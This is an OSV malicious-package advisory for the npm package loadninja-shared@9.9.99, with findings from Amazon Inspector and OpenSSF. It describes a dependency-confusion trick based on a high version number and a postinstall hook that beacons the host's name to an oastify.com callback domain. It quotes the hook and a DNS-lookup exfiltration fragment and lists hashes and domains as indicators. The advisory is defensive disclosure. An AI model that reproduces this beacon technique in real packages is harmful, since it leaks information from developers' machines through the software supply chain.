MAL-2026-5744
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/loadninja-shared/MAL-2026-5744.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5744
- Published
- 2026-06-13T20:03:43Z
- Modified
- 2026-06-13T20:46:41.191477820Z
- Summary
- Malicious code in loadninja-shared (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46)
loadninja-shared@9.9.99 is a dependency-confusion package targeting an internal/private package namespace. package.json declares
"postinstall": "node beacon.js", which fires automatically onnpm install. beacon.js readsos.hostname()and transmits it — together with a nonce and the package name — to the attacker-controlled out-of-band domaintspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com(Burp Collaborator infrastructure) over both a DNS lookup (dns.lookup(NONCE + '.' + host63 + '.' + HOST,...)) and an HTTPS POST. The version9.9.99is the canonical high-version trick used to win npm resolution against a legitimate internal package of the same name, capturing misrouted internal builds. Although a code comment labels the file a "benign PoC," the behavior is identical to a live dependency-confusion exploitation beacon: any installer that resolves this package leaks its host identifier to a third-party callback domain without consent.Source: ossf-package-analysis (1ead72fc15074f049a104031ef60cad8af0f0680d1bf5ffee1492f500a3506d8)
The OpenSSF Package Analysis project identified 'loadninja-shared' @ 9.9.99 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-006370", "import_time": "2026-06-13T20:33:18.482928563Z", "sha256": "4d2bec7384a59c29b1f8dc5ca186674f7462dfc1c7768326606dcf855ba46fc7", "source": "amazon-inspector", "modified_time": "2026-06-13T20:11:52Z", "versions": [ "9.9.99" ] }, { "id": "IN-MAL-2026-006369", "versions": [ "9.9.99" ], "sha256": "dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46", "source": "amazon-inspector", "modified_time": "2026-06-13T20:11:52Z", "import_time": "2026-06-13T20:33:18.450827318Z" }, { "import_time": "2026-06-13T20:33:16.835584204Z", "sha256": "1ead72fc15074f049a104031ef60cad8af0f0680d1bf5ffee1492f500a3506d8", "source": "ossf-package-analysis", "modified_time": "2026-06-13T20:03:43Z", "versions": [ "9.9.99" ] } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- OpenSSF: Package Analysis - FINDER
-
Affected packages
npm / loadninja-shared
Package
- Name
- loadninja-shared
- View open source insights on deps.dev
- Purl
- pkg:npm/loadninja-shared
Database specific
cwes
[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
indicators
{
"evidence_files": [
{
"path": "beacon.js",
"sha256": "8c192b85697649c4333289e69736e35222e82facf81728fdf61be9ba093d01ba",
"tlsh": "a621c8ff6498a1413fa675c9d26f32251123d2628285cfe0f4afd1696f5853942934fc"
},
{
"path": "package.json",
"sha256": "77a8edc1f9eb6c6c41bb5b14c238ff45f94aab6a56722d3cea1cf0f291983fbc",
"tlsh": "2fd0a7544d059b7720c44aa98c62d50e75710c5f5128b4084f83110471eabb358ba20e"
}
],
"package_integrity": [
{
"filename": "loadninja-shared-9.9.99.tgz",
"hashes": {
"sha512_sri": "sha512-UhHVLc2TiZqoMKhzkCkSNYicTbXR/pwQZf6y6HB2S2W/oxB9qcmB1sw0ViabluBPaDyPVClTkKFr5Pkw+ITNkQ==",
"sha1": "3844b713aa3b94ced6c3067f6fe36a65004b1947"
}
}
],
"domains": [
"c649856e.scan-6aec7d6ce796.tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com",
"tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com"
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/loadninja-shared/MAL-2026-5744.json"